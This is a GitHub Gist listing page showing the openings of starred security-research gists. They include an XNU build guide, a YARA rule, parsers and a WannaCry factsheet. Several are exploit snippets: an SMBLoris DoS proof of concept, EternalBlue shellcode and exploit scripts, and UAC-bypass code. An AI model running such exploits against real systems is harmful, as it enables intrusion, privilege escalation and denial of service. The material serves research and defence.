Skip to content

Instantly share code, notes, and snippets.

View M1suzu's full-sized avatar

Zhang M1suzu

55 followers · 176 following
View GitHub Profile
@Proteas
Proteas / xnu-4570.1.46-arm64-steps.txt
Created October 9, 2017 02:46
steps to build arm64 version of xnu-4570.1.46
Following are my steps to build the ARM64 version of xnu-4570.1.46, hope this is helpfull for saving time.
1. Use Xcode 9.0
2. Preparation is same as macOS, and there is a guide: https://0xcc.re/building-xnu-kernel-macosx-sierrra-10-12-x/
3. There is an ARM64 version libfirehose: https://github.com/Proteas/install_firehose_lib
4. Copy and edit the ARM64 config(CFLAGS, LDFLAGS) from darwin-on-arm/xnu to your target project
5. Example CFLAGS: -Darm64 -DARM64 -D__arm64__ -D__ARM64__ -DLP64 -DCONFIG_EMBEDDED -mkernel -DARM64_BOARD_CONFIG_T8011=1
6. Fix compiling stage errors by directly importing the missing headers or editing the code
7. Fix linking stage errors by implementing place holder funcitons for: chudxnu_cpu_alloc, etc
8. If missing symbol __divti3 in linking stage, get the runtime from llvm.
@williballenthin
williballenthin / stackstrings.yara
Last active March 12, 2025 07:04
match x86 that appears to be stack string creation
rule stack_strings
{
meta:
author = "William Ballenthin"
email = "[email protected]"
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
strings:
@marcan
marcan / smbloris.c
Last active November 22, 2022 08:32
SMBLoris attack proof of concept
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block
@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@hfiref0x
hfiref0x / gist:59c689a14f1fc2302d858ae0aa3f6b86
Created May 27, 2017 06:30
CIA Stinger UAC bypass (likely)
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
@tyranid
tyranid / bypass_uac.ps1
Last active July 11, 2024 12:27
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
@worawit
worawit / eternalblue7_exploit.py
Last active November 1, 2024 23:12
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@rain-1
rain-1 / Wannacrypt0r-FACTSHEET.md
Last active March 30, 2025 17:12 — forked from Epivalent/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@skochinsky
skochinsky / rich.py
Created April 13, 2017 13:03
MSVC PE Rich header parser with compiler version display
# based on code from http://trendystephen.blogspot.be/2008/01/rich-header.html
import sys
import struct
# I'm trying not to bury the magic number...
CHECKSUM_MASK = 0x536e6144 # DanS (actuall SnaD)
RICH_TEXT = 'Rich'
RICH_TEXT_LENGTH = len(RICH_TEXT)
PE_START = 0x3c
PE_FIELD_LENGTH = 4
@ChiChou
ChiChou / iOS-checksec.py
Last active March 8, 2023 02:30
checksec for iOS executables based on lief
#!/usr/bin/env python3
import struct
import lief
from lief.MachO import LOAD_COMMAND_TYPES, HEADER_FLAGS
def check(filename):
macho = lief.parse(filename)
# check this?